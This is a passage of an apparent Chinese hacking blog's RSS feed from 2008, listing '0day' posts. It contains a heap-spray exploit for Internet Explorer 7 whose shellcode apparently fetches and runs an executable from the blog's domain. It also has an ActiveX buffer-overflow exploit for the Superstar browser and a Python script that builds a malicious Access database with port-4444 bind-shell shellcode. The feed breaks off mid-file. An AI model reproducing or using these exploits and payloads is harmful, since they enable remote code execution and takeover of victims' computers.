LABEL_13;<br/>&nbsp;&nbsp;if ( *(_DWORD *)(dword_7686F3E0 + 12 * v15) )<br/>&nbsp;&nbsp;&nbsp;&nbsp;sub_76854B88(*(_DWORD *)(dword_7686F3E0 + 12 * v15), a5, (int)&amp;v13, (int)&amp;v14);<br/>&nbsp;&nbsp;if ( v13 )<br/>&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;if ( !a3 &amp;&amp; !*(_DWORD *)(v13 + 8) )<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;++*(_DWORD *)(v13 + 16);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;++**(_DWORD **)(v13 + 4);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;goto LABEL_17;<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;v9 = sub_76854A96(a4, (HLOCAL *)&amp;a3, a2, a3, 0, 0, a7, a8);<br/>&nbsp;&nbsp;&nbsp;&nbsp;if ( !v9 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v12 = *(_DWORD *)(v13 + 4);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v10 = a3;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)a3 + 1) = *(_DWORD *)(v13 + 4);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;++*(_DWORD *)v12;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;goto LABEL_8;<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>LABEL_13:<br/>&nbsp;&nbsp;&nbsp;&nbsp;v8 = v9;<br/>LABEL_17:<br/>&nbsp;&nbsp;&nbsp;&nbsp;RtlReleaseResource(&amp;unk_7686F3E4);<br/>LABEL_18:<br/>&nbsp;&nbsp;&nbsp;&nbsp;NtClose(a2);<br/>&nbsp;&nbsp;&nbsp;&nbsp;return v8;<br/>&nbsp;&nbsp;}<br/><span style="color:Red">&nbsp;&nbsp;v9 = sub_76854A96(a4, (HLOCAL *)&amp;a3, a2, a3, a5, a6, a7, a8);</span>//这里调用了漏洞，由此触发<br/>&nbsp;&nbsp;if ( v9 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;goto LABEL_13;<br/>&nbsp;&nbsp;v10 = a3;<br/>LABEL_8:<br/>&nbsp;&nbsp;if ( v14 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;*(_DWORD *)v14 = v10;<br/>&nbsp;&nbsp;else<br/>&nbsp;&nbsp;&nbsp;&nbsp;*(_DWORD *)(dword_7686F3E0 + 12 * v15) = v10;<br/>&nbsp;&nbsp;RtlReleaseResource(&amp;unk_7686F3E4);<br/>&nbsp;&nbsp;return 0;<br/>}[/color]]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=60</link>
			<title><![CDATA[Internet Explorer 7.0  XML 0day]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Wed,10 Dec 2008 13:51:05 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=60</guid>
		<description><![CDATA[漏洞环境：<br/>XP/2003+Internet Explorer 7.0<br/><br/>测试效果： 弹出计算器程序<br/><br/>评述：10月份就有人喊着卖了，据说当时价值12W RMB<br/>&lt;script language=&#34;javascript&#34;&gt;<br/><br/>if(navigator.userAgent.toLowerCase().indexOf(&#34;\x6D\x73\x69\x65 \x37&#34;)==-1)<br/>location.replace(&#34;\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B&#34;);<br/>&lt;/script&gt;<br/>&lt;script&gt;function sleep(milliseconds)<br/>{<br/>&#160;&#160;&#160;&#160;var start = new Date().getTime(); <br/>&#160;&#160;&#160;&#160;for (var i = 0; i &lt; 1e7; i++) { <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;if ((new Date().getTime() - start) &gt; milliseconds)<br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;break;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;}<br/>&#160;&#160;&#160;&#160;}<br/>} <br/>function spray(sc) { <br/>var string1 = 0x0a0a0a0a; <br/>var string1temp=unescape; <br/>var shellcodesize = string1temp(sc); <br/>var heapBlockSize = 0x100000; var payLoadSize = shellcodesize.length * 2; <br/>var szlong = heapBlockSize -(payLoadSize+0x038); <br/>var retVal = string1temp(&#34;%u0a0a%u0a0a&#34;); <br/>retVal = getSampleValue(retVal,szlong);&nbsp;&nbsp;<br/>aaablk = (string1 - 0x100000)/heapBlockSize;&nbsp;&nbsp; <br/>zzchuck = new Array();&nbsp;&nbsp;&nbsp;&nbsp;<br/>for (i=0;i&lt;aaablk;i++) <br/>{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>zzchuck[i] = retVal + shellcodesize; <br/>} <br/>}&nbsp;&nbsp; <br/><br/>function getSampleValue(retVal, szlong) {&nbsp;&nbsp;<br/>while(retVal.length*2&lt;szlong) <br/>{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br/>retVal += retVal; }&nbsp;&nbsp;&nbsp;&nbsp;<br/>retVal = retVal.substring(0,szlong/2); <br/>return retVal; <br/>} <br/>var a1=&#34;%u&#34;;<br/>spray(&#34;%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u662f%u6972%u6464%u2e79%u6e63%u652f%u7078%u632f%u6c61%u2e63%u7865%u0065&#34;); <br/>sleep(5000);<br/>nav=navigator.userAgent.toLowerCase(); <br/>if (navigator.appVersion.indexOf(&#39;MSIE&#39;)!=-1) <br/>{&nbsp;&nbsp; version=parseFloat(navigator.appVersion.split(&#39;MSIE&#39;)[1]) <br/>} <br/>if (version==7) <br/>{&nbsp;&nbsp;<br/> w2k3 = ((nav.indexOf(&#39;windows nt 5.2&#39;)!=-1) || (nav.indexOf(&#39;windows 2003&#39;)!=-1)); <br/> wxp = ((nav.indexOf(&#39;windows nt 5.1&#39;)!=-1) || (nav.indexOf(&#39;windows xp&#39;)!=-1));&nbsp;&nbsp; <br/>&nbsp;&nbsp;if (wxp||w2k3)&nbsp;&nbsp;&nbsp;&nbsp;document.write(&#39;&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;image SRC=http://rਊr.test.com src=http://www.google.cn]]&gt;&lt;![CDATA[&gt;]]<br/><br/>&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;XML ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;&#39;);&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;var i=1;&nbsp;&nbsp;<br/> while ( i &lt;= 10 )&nbsp;&nbsp; <br/> {window.status=&#34; &#34;;i++; } <br/>}&nbsp;&nbsp; <br/>&lt;/script&gt;]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=28</link>
			<title><![CDATA[以色列人发现的IE 0day]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Fri,26 Sep 2008 09:42:31 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=28</guid>
		<description><![CDATA[ ##不提供下载##<br/><br/>刑法第２８５条规定，违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。 <br/><br/>刑法修正案（七）在刑法第２８５条中增加两款（第二款、第三款）： <br/><br/>“违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。” <br/><br/>“提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。” <br/><br/><br/><br/>&lt;html&gt;<br/>&lt;body&gt;<br/>点击选项，选中打印链表列表，点打印<br/>&lt;a href=&#34;<a href="http://www.bl.com?zzz=dsasad" target="_blank" rel="external">http://www.bl.com?zzz=dsasad</a><br/>&lt;script defer&gt;<br/>var ForWriting = 2;<br/>var strFile = &#39;c:\\test2.js&#39;;<br/>var objFSO = new ActiveXObject(&#39;Scripting.FileSystemObject&#39;); <br/>。。。。。。。。。。。。。。<br/>&lt;/script&gt;a.c&lt;u&gt;o&lt;/u&gt;m&#34;&gt;&lt;/a&gt;<br/>&lt;script&gt;window.print();&lt;/script&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=23</link>
			<title><![CDATA[超星浏览器4.0漏洞0day]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Tue,16 Sep 2008 16:02:04 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=23</guid>
		<description><![CDATA[超星的漏洞，我下午才调出来的，国内喜欢研究的，拿去玩吧！国内大学里好多人在用。。。。。。。。。<br/>超星赶快补上这个漏洞吧！(2008.9.17我通知超星此漏洞，2008.9.18超星已经回复要修补此漏洞，支持一下超星！！)<br/><br/>本文章只含有漏洞存在的证明，效果是运行计算器的程序，不含有攻击性代码！<br/>转载请注明作者<br/><br/><br/>漏洞位置：clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2的LoadPage函数发生缓冲区溢出<br/>漏洞告警: ACCESS_VIOLATION<br/>Disasm: 41414141&#160;&#160;&#160;&#160;?????&#160;&#160;&#160;&#160;()<br/><br/>寄存器状态:<br/>--------------------------------------------------<br/>EIP 41414141<br/>EAX BAADF000<br/>EBX 00000000<br/>ECX 00000000<br/>EDX 00B36F48 -&gt; 016E9D0C<br/>EDI 0013E084 -&gt; Uni: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br/>ESI 0013E39C -&gt; 00000000<br/>EBP 00B36F48 -&gt; 016E9D0C<br/>ESP 0013D85C -&gt; Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br/><br/><br/>ArgDump:<br/>--------------------------------------------------<br/>EBP+8&#160;&#160;&#160;&#160;BAADF00D<br/>EBP+12&#160;&#160;&#160;&#160;00000000<br/>EBP+16&#160;&#160;&#160;&#160;BAADF00D<br/>EBP+20&#160;&#160;&#160;&#160;BAADF00D<br/>EBP+24&#160;&#160;&#160;&#160;BAADF00D<br/>EBP+28&#160;&#160;&#160;&#160;BAADF00D<br/><br/><br/>Stack Dump:<br/>--------------------------------------------------<br/>13D85C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41&nbsp;&nbsp;[................]<br/>13D86C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41&nbsp;&nbsp;[................]<br/>13D87C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41&nbsp;&nbsp;[................]<br/>13D88C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41&nbsp;&nbsp;[................]<br/>13D89C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41&nbsp;&nbsp;[................]<br/><br/><br/><br/>漏洞利用程序：<br/><br/>&lt;object classid=&#34;clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2&#34; id=&#39;target&#39;&gt;&lt;/object&gt;<br/>&lt;P&gt;Made By Friddy QQ:568623<br/>&lt;P&gt;<a href="http://www.friddy.cn" target="_blank" rel="external">http://www.friddy.cn</a><br/>&lt;SCRIPT language=&#34;javascript&#34;&gt;<br/>var shellcode = unescape(&#34;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#34;);<br/>var bigblock = unescape(&#34;%u9090%u9090&#34;);<br/>var headersize = 20;<br/>var slackspace = headersize+shellcode.length;//总长度<br/>while (bigblock.length&lt;slackspace) bigblock+=bigblock;<br/>fillblock = bigblock.substring(0, slackspace);<br/>block = bigblock.substring(0, bigblock.length-slackspace);<br/>while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;<br/>memory = new Array();<br/>for (x=0; x&lt;300; x++) memory[x] = block + shellcode;<br/>var buffer = &#39;&#39;;<br/>while (buffer.length &lt; 3092) buffer+=&#34;\x0a\x0a\x0a\x0a&#34;;<br/>target.LoadPage(buffer ,1 ,1 ,1);//这次出问题的是LoadPage.不是Register了<br/>&lt;/script&gt;<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=16</link>
			<title><![CDATA[python版本的Access溢出利用程序]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Thu,11 Sep 2008 11:06:10 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=16</guid>
		<description><![CDATA[#python版本的Access溢出利用程序,改的国外的，用了好多年了，依然好用。拿Shell好用<br/>import sys<br/>import struct<br/><br/><br/><br/># the code to open port 4444 for test<br/><br/>friddy&nbsp;&nbsp;= &#34;\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x33\x01\x80\x34\x0b\xf8\xe2\xfa&#34;<br/>friddy += &#34;\xeb\x05\xe8\xeb\xff\xff\xff\x11\xfd\xf9\xf8\xf8\xa7\x9c\x59\xc8&#34;<br/>friddy += &#34;\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92&#34;<br/>friddy += &#34;\xfb\xa1\x10\x5d\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f&#34;<br/>friddy += &#34;\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfd\xa1\x10\x74\xf8\xf8\xf8&#34;<br/>friddy += &#34;\x1a\x01\x7b\x3f\xfc\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8&#34;<br/>friddy += &#34;\xf8\x07\xae\xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe8\x73&#34;<br/>friddy += &#34;\x20\xcb\x38\xa8\xa8\x9e\x73\xae\xd8\x7e\x2e\x39\x32\xe8\x9e\x42&#34;<br/>friddy += &#34;\xfa\xf8\xaa\x73\x2c\x92\xe8\xaa\xab\x07\xae\xec\x92\xf9\xab\x07&#34;<br/>friddy += &#34;\xae\xe0\xa8\xa8\xab\x07\xae\xe4\x73\x20\x90\x9b\x95\x9c\xf8\x75&#34;<br/>friddy += &#34;\xec\xdc\x7b\x14\xac\x73\x04\x92\xec\xa1\xcb\x38\x71\xfc\x77\x1a&#34;<br/>friddy += &#34;\x03\x3e\xbf\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71\xa7\xb0\x71\xa7&#34;<br/>friddy += &#34;\xb4\x71\xa7\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9\x92\xf9\xa9\xa9&#34;<br/>friddy += &#34;\xaa\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0\xa9\xae\x73\x8d&#34;<br/>friddy += &#34;\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb\x0d\xcb\x31\xb1&#34;<br/>friddy += &#34;\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c\xf0\x39\x33\xff&#34;<br/>friddy += &#34;\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6\xdc\xfb\x25\x9e&#34;<br/>friddy += &#34;\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb\x3d\x53\xa6\xa1&#34;<br/>friddy += &#34;\x3b\x10\x0e\x06\x07\x07\xca\x8c\x69\xf4\x31\x44\x5e\x93\x77\x0a&#34;<br/>friddy += &#34;\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c\xe8\x5f\x25\xf4\x67&#34;<br/>friddy += &#34;\x2b\xb3\x49\xe6\x6f\xf9\xa4\xe9\x47\x1d&#34;<br/><br/><br/><br/>Shellcode_p1&nbsp;&nbsp;= &#34;\x31\xc9\x83\xe9\xb7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97&#34;<br/>Shellcode_p1 += &#34;\x25\xaa\xb5\x83\xeb\xfc\xe2\xf4\x6b\x4f\x41\xfa\x7f\xdc\x55\x4a&#34;<br/>Shellcode_p1 += &#34;\x68\x45\x21\xd9\xb3\x01\x21\xf0\xab\xae\xd6\xb0\xef\x24\x45\x3e&#34;<br/>Shellcode_p1 += &#34;\xd8\x3d\x21\xea\xb7\x24\x41\x56\xa7\x6c\x21\x81\x1c\x24\x44\x84&#34;<br/>Shellcode_p1 += &#34;\x57\xbc\x06\x31\x57\x51\xad\x74\x5d\x28\xab\x77\x7c\xd1\x91\xe1&#34;<br/>Shellcode_p1 += &#34;\xb3\x0d\xdf\x56\x1c\x7a\x8e\xb4\x7c\x43\x21\xb9\xdc\xae\xf5\xa9&#34;<br/>Shellcode_p1 += &#34;\x96\xce\xa9\x99\x1c\xac\xc6\x91\x8b\x44\x69\x84\x57\x41\x21\xf5&#34;<br/>Shellcode_p1 += &#34;\xa7\xae\xea\xb9\x1c\x55\xb6\x18\x1c\x65\xa2\xeb\xff\xab\xe4\xbb&#34;<br/>Shellcode_p1 += &#34;\x7b\x75\x55\x63\xa6\xfe\xcc\xe6\xf1\x4d\x99\x87\xff\x52\xd9\x87&#34;<br/>Shellcode_p1 += &#34;\xc8\x71\x55\x65\xff\xee\x47\x49\xac\x75\x55\x63\xc8\xac\x4f\xd3&#34;<br/>Shellcode_p1 += &#34;\x16\xc8\xa2\xb7\xc2\x4f\xa8\x4a\x47\x4d\x73\xbc\x62\x88\xfd\x4a&#34;<br/>Shellcode_p1 += &#34;\x41\x76\xf9\xe6\xc4\x66\xf9\xf6\xc4\xda\x7a\xdd&#34; <br/>Shellcode_p2&nbsp;&nbsp;= &#34;\xf1\x76\x23\x54\x02\x4d\x46\x4c\x3d\x45\xfd\x4a&#34;<br/>Shellcode_p2 += &#34;\x41\x4f\xba\xe4\xc2\xda\x7a\xd3\xfd\x41\xcc\xdd\xf4\x48\xc0\xe5&#34;<br/>Shellcode_p2 += &#34;\xce\x0c\x66\x3c\x70\x4f\xee\x3c\x75\x14\x6a\x46\x3d\xb0\x23\x48&#34;<br/>Shellcode_p2 += &#34;\x69\x67\x87\x4b\xd5\x09\x27\xcf\xaf\x8e\x01\x1e\xff\x57\x54\x06&#34;<br/>Shellcode_p2 += &#34;\x81\xda\xdf\x9d\x68\xf3\xf1\xe2\xc5\x74\xfb\xe4\xfd\x24\xfb\xe4&#34;<br/>Shellcode_p2 += &#34;\xc2\x74\x55\x65\xff\x88\x73\xb0\x59\x76\x55\x63\xfd\xda\x55\x82&#34;<br/>Shellcode_p2 += &#34;\x68\xf5\xc2\x52\xee\xe3\xd3\x4a\xe2\x21\x55\x63\x68\x52\x56\x4a&#34;<br/>Shellcode_p2 += &#34;\x47\x4d\x5a\x3f\x93\x7a\xf9\x4a\x41\xda\x7a\xb5&#34;<br/><br/><br/># Header<br/>mdbHeader&nbsp;&nbsp;= &#34;\x00\x01\x00\x00\x53\x74\x61\x6E\x64\x61\x72\x64\x20\x4A\x65\x74&#34;<br/>mdbHeader += &#34;\x20\x44\x42\x00\x01\x00\x00\x00\xB5\x6E\x03\x62\x60\x09\xC2\x55&#34;<br/>mdbHeader += &#34;\xE9\xA9\x67\x72\x40\x3F\x00\x9C\x7E\x9F\x90\xFF\x85\x9A\x31\xC5&#34;<br/>mdbHeader += &#34;\x79\xBA\xED\x30\xBC\xDF\xCC\x9D\x63\xD9\xE4\xC3\x9F\x46\xFB\x8A&#34;<br/>mdbHeader += &#34;\xBC\x4E\xB2\x6D\xEC\x37\x69\xD2\x9C\xFA\xF2\xC8\x28\xE6\x27\x20&#34;<br/>mdbHeader += &#34;\x8A\x60\x60\x02\x7B\x36\xC1\xE4\xDF\xB1\x43\x62\x13\x43\xFB\x39&#34;<br/>mdbHeader += &#34;\xB1\x33\x00\xF7\x79\x5B\xA6\x23\x7C\x2A\xAF\xD0\x7C\x99\x08\x1F&#34;<br/>mdbHeader += &#34;\x98\xFD\x1B\xC9\x5A\x6A\xE2\xF8\x82\x66\x5F\x95\xF8\xD0\x89\x24&#34;<br/>mdbHeader += &#34;\x85\x67\xC6\x1F\x27\x44\xD2\xEE\xCF\x65\xED\xFF\x07\xC7\x46\xA1&#34;<br/>mdbHeader += &#34;\x78\x16\x0C\xED\xE9\x2D\x62\xD4\x54\x06\x00\x00\x34\x2E\x30\x00&#34;<br/><br/><br/># Body<br/>mdbBody&nbsp;&nbsp;= &#34;\x00\x00\x80\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF&#34;<br/>mdbBody += &#34;\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF&#34;<br/>mdbBody += &#34;\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF&#34;<br/>mdbBody += &#34;\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF&#34;<br/>mdbBody += &#34;\x02\x01\xDE\x0B\x00\x00\x00\x00\x90\x90\x90\x90\x59\x06\x00\x00&#34;<br/>mdbBody += &#34;\x11\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x00\x00\x00\x00\x53\x11\x00\x0B\x00\x11\x00\x02&#34;<br/>mdbBody += &#34;\x00\x00\x00\x02\x00\x00\x00\x00\x06\x00\x00\x01\x06\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x00\x00\x00\x0C\x59\x06\x00\x00\x09\x00\x03\x00&#34;<br/>mdbBody += &#34;\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x0C\x59\x06\x00\x00\x08\x00\x02\x00\x00\x00\x09\x04\x00\x00\x12&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x59\x06\x00\x00\x04\x00&#34;<br/>mdbBody += &#34;\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x0a\x00&#34;<br/>mdbBody += &#34;\x08\x00\x08\x59\x06\x00\x00\x05\x00\x01\x00\x00\x00\x09\x04\x00&#34;<br/>mdbBody += &#34;\x00\x13\x00\x00\x00\x00\x00\x12\x00\x08\x00\x04\x59\x06\x00\x00&#34;<br/>mdbBody += &#34;\x07\x00\x02\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x1A\x00\x04\x00\x0A\x59\x06\x00\x00\x0A\x00\x04\x00\x00\x00\x09&#34;<br/>mdbBody += &#34;\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x04\x00\x0B\x59\x06\x00\x00\x0D\x00\x07\x00\x00&#34;<br/>mdbBody += &#34;\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B&#34;<br/>mdbBody += &#34;\x59\x06\x00\x00\x10\x00\x0A\x00\x00\x00\x09\x04\x00\x00\x12\x00&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x59\x06\x00\x00\x0F\x00\x09&#34;<br/>mdbBody += &#34;\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x0B\x59\x06\x00\x00\x0E\x00\x08\x00\x00\x00\x09\x04\x00\x00&#34;<br/>mdbBody += &#34;\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x59\x06\x00\x00\x02&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\xFE\x01\x09\x59\x06\x00\x00\x06\x00\x01\x00\x00\x00\x09\x04&#34;<br/>mdbBody += &#34;\x00\x00\x32\x00\x00\x00\x00\x00\x00\x00\xFE\x01\x04\x59\x06\x00&#34;<br/>mdbBody += &#34;\x00\x01\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x04\x00\x04\x00\x0B\x59\x06\x00\x00\x0C\x00\x06\x00\x00\x00&#34;<br/>mdbBody += &#34;\x09\x04\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x59&#34;<br/>mdbBody += &#34;\x06\x00\x00\x0B\x00\x05\x00\x00\x00\x09\x04\x00\x00\x12\x00\x00&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x00\xFE\x01\x03\x59\x06\x00\x00\x03\x00\x01\x00&#34;<br/>mdbBody += &#34;\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00\x08\x00\x02\x00&#34;<br/>mdbBody += &#34;\x0E\x00\x43\x00\x6F\x00\x6E\x00\x6E\x00\x65\x00\x63\x00\x74\x00&#34;<br/>mdbBody += &#34;\x10\x00\x44\x00\x61\x00\x74\x00\x61\x00\x62\x00\x61\x00\x73\x00&#34;<br/>mdbBody += &#34;\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00\x65\x00\x43\x00\x72\x00&#34;<br/>mdbBody += &#34;\x65\x00\x61\x00\x74\x00\x65\x00\x14\x00\x44\x00\x61\x00\x74\x00&#34;<br/>mdbBody += &#34;\x65\x00\x55\x00\x70\x00\x64\x00\x61\x00\x74\x00\x65\x00\x0A\x00&#34;<br/>mdbBody += &#34;\x46\x00\x6C\x00\x61\x00\x67\x00\x73\x00\x16\x00\x46\x00\x6F\x00&#34;<br/>mdbBody += &#34;\x72\x00\x65\x00\x69\x00\x67\x00\x6E\x00\x4E\x00\x61\x00\x6D\x00&#34;<br/>mdbBody += &#34;\x65\x00\x04\x00\x49\x00\x64\x00\x04\x00\x4C\x00\x76\x00\x0E\x00&#34;<br/>mdbBody += &#34;\x4C\x00\x76\x00\x45\x00\x78\x00\x74\x00\x72\x00\x61\x00\x10\x00&#34;<br/>mdbBody += &#34;\x4C\x00\x76\x00\x4D\x00\x6F\x00\x64\x00\x75\x00\x6C\x00\x65\x00&#34;<br/>mdbBody += &#34;\x0C\x00\x4C\x00\x76\x00\x50\x00\x72\x00\x6F\x00\x70\x00\x08\x00&#34;<br/>mdbBody += &#34;\x4E\x00\x61\x00\x6D\x00\x65\x00\x0A\x00\x4F\x00\x77\x00\x6E\x00&#34;<br/>mdbBody += 